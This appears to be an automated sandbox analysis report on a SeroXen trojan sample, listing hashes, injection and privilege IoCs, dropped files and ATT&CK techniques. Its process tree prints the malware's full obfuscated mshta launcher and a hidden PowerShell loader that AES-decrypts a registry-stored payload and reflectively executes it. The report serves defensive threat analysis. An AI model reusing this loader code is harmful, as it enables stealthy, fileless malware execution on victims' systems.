seroxen | ac562299cd216585d58cab4c435c1578f3e451820a4c0feb2d902d0662645446

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
04-02-2025 21:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payload_1_sxr.exe
Size

10.3MB
MD5

a0986241fcfed849a9d1dce2466840de
SHA1

6e47f0378ab7c921b3c04d29aae5de1415d1aaf8
SHA256

ac562299cd216585d58cab4c435c1578f3e451820a4c0feb2d902d0662645446
SHA512

8e192128a7be9b6b0857a3eca1a479ed28eaae2943ae1803fdd4b523c57e106f089c6b04cfe318a757171a3e52a603d91d395f94adbf9d5d5f300b3d91311ca4
SSDEEP

49152:sKxzaVKJayp/GrDlGcfk/5ZRuUtNUDrTRaDqeF5gLRyoKq6XBkim7fEM27cIgpvW:sKxzcK

Score

10^/10

seroxen defense_evasion trojan

Malware Config

Signatures

Seroxen family
seroxen
Seroxen, Ser0xen
Seroxen or SeroXen aka Ser0Xen is a trojan fist disovered in late 2022.
trojan seroxen

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 1100 created 432	1100	payload_1_sxr.exe	5
PID 1100 created 432	1100	payload_1_sxr.exe	5
PID 1100 created 432	1100	payload_1_sxr.exe	5

Executes dropped EXE 3 IoCs

pid	Process
2680	$sxr-mshta.exe
2796	$sxr-cmd.exe
2640	$sxr-powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2640	$sxr-powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	$sxr-powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1100 set thread context of 1984	1100	payload_1_sxr.exe	28
PID 1100 set thread context of 2496	1100	payload_1_sxr.exe	29
PID 1100 set thread context of 2720	1100	payload_1_sxr.exe	37
PID 1100 set thread context of 2748	1100	payload_1_sxr.exe	38
PID 1100 set thread context of 1408	1100	payload_1_sxr.exe	39
PID 1100 set thread context of 2744	1100	payload_1_sxr.exe	40

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-cmd.exe	payload_1_sxr.exe
File created	C:\Windows\$sxr-powershell.exe	payload_1_sxr.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	payload_1_sxr.exe
File created	C:\Windows\$sxr-mshta.exe	payload_1_sxr.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	payload_1_sxr.exe
File created	C:\Windows\$sxr-cmd.exe	payload_1_sxr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
1100	payload_1_sxr.exe
1984	dllhost.exe
1984	dllhost.exe
1984	dllhost.exe
1984	dllhost.exe
2496	dllhost.exe
2496	dllhost.exe
2496	dllhost.exe
2496	dllhost.exe
1100	payload_1_sxr.exe
1100	payload_1_sxr.exe
2640	$sxr-powershell.exe
1100	payload_1_sxr.exe
2720	dllhost.exe
2720	dllhost.exe
2720	dllhost.exe
2720	dllhost.exe
2748	dllhost.exe
2748	dllhost.exe
2748	dllhost.exe
2748	dllhost.exe
1100	payload_1_sxr.exe
1100	payload_1_sxr.exe
1408	dllhost.exe
1408	dllhost.exe
1408	dllhost.exe
1408	dllhost.exe
1100	payload_1_sxr.exe
2744	dllhost.exe
2744	dllhost.exe
2744	dllhost.exe
2744	dllhost.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1100	payload_1_sxr.exe
Token: SeDebugPrivilege	1100	payload_1_sxr.exe
Token: SeDebugPrivilege	1984	dllhost.exe
Token: SeDebugPrivilege	2496	dllhost.exe
Token: SeDebugPrivilege	2640	$sxr-powershell.exe
Token: SeDebugPrivilege	1100	payload_1_sxr.exe
Token: SeDebugPrivilege	2720	dllhost.exe
Token: SeDebugPrivilege	2748	dllhost.exe
Token: SeDebugPrivilege	1100	payload_1_sxr.exe
Token: SeDebugPrivilege	1408	dllhost.exe
Token: SeDebugPrivilege	2744	dllhost.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 1984	1100	payload_1_sxr.exe	28
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1100 wrote to memory of 2496	1100	payload_1_sxr.exe	29
PID 1976 wrote to memory of 2680	1976	taskeng.exe	31
PID 1976 wrote to memory of 2680	1976	taskeng.exe	31
PID 1976 wrote to memory of 2680	1976	taskeng.exe	31
PID 2680 wrote to memory of 2796	2680	$sxr-mshta.exe	32
PID 2680 wrote to memory of 2796	2680	$sxr-mshta.exe	32
PID 2680 wrote to memory of 2796	2680	$sxr-mshta.exe	32
PID 2796 wrote to memory of 2640	2796	$sxr-cmd.exe	34
PID 2796 wrote to memory of 2640	2796	$sxr-cmd.exe	34
PID 2796 wrote to memory of 2640	2796	$sxr-cmd.exe	34
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2720	1100	payload_1_sxr.exe	37
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 2748	1100	payload_1_sxr.exe	38
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 1408	1100	payload_1_sxr.exe	39
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40
PID 1100 wrote to memory of 2744	1100	payload_1_sxr.exe	40

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{9d08454f-bcb6-449d-8940-551cbc079432}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e85a41a8-bc5e-479a-a18e-96dbbd842541}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{d03f92de-e819-42e2-8bf3-169297fdf2ba}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1408

C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe
"C:\Users\Admin\AppData\Local\Temp\payload_1_sxr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{1475d315-b61f-41fa-9abc-b7526c246e42}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{b396f7b4-a54c-46da-9737-6d52ddcbf93d}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{84bc3a8f-e492-43ba-b7a1-f5c885afc4a0}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744

C:\Windows\system32\taskeng.exe
taskeng.exe {D7329154-DA24-4876-9E55-C5ECD7F3F85D} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = [Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))
      4⤵
      Executes dropped EXE
      Hide Artifacts: Hidden Window
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\$sxr-cmd.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
13KB

MD5
95828d670cfd3b16ee188168e083c3c5

SHA1
83c70c66cd4e971be2e36efdc27fbcb7ff289032

SHA256
8c10ae4be93834a4c744f27ca79736d9123ed9b0d180db28556d2d002545baf2

SHA512
22be50366cf57fd3507760122ccaa3d74e6a137c2d46377597284d62762bfca740bed71ddc4eca60e4ba81055eb3d1bde34af382a2c4587ba9335d670d7f3b2e

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1100-41-0x0000000077720000-0x00000000778C9000-memory.dmp

Filesize
1.7MB

Download
memory/1100-4-0x0000000000A00000-0x0000000000A56000-memory.dmp

Filesize
344KB

Download
memory/1100-5-0x0000000002550000-0x00000000025A8000-memory.dmp

Filesize
352KB

Download
memory/1100-6-0x0000000000950000-0x0000000000972000-memory.dmp

Filesize
136KB

Download
memory/1100-7-0x0000000077720000-0x00000000778C9000-memory.dmp

Filesize
1.7MB

Download
memory/1100-78-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-61-0x0000000077720000-0x00000000778C9000-memory.dmp

Filesize
1.7MB

Download
memory/1100-8-0x0000000077500000-0x000000007761F000-memory.dmp

Filesize
1.1MB

Download
memory/1100-42-0x0000000077500000-0x000000007761F000-memory.dmp

Filesize
1.1MB

Download
memory/1100-3-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-2-0x00000000008A0000-0x0000000000944000-memory.dmp

Filesize
656KB

Download
memory/1100-1-0x000000013FAC0000-0x000000014050E000-memory.dmp

Filesize
10.3MB

Download
memory/1100-32-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-0-0x000007FEF5E13000-0x000007FEF5E14000-memory.dmp

Filesize
4KB

Download
memory/1100-31-0x000007FEF5E13000-0x000007FEF5E14000-memory.dmp

Filesize
4KB

Download
memory/1100-11-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-10-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp

Filesize
9.9MB

Download
memory/1100-9-0x0000000000970000-0x000000000097A000-memory.dmp

Filesize
40KB

Download
memory/1984-15-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/1984-12-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2496-21-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2496-17-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-18-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-19-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-20-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-16-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-22-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2496-24-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2640-39-0x000000001B9C0000-0x000000001BCA2000-memory.dmp

Filesize
2.9MB

Download
memory/2640-40-0x0000000000370000-0x0000000000378000-memory.dmp

Filesize
32KB

Download
memory/2744-75-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2748-54-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download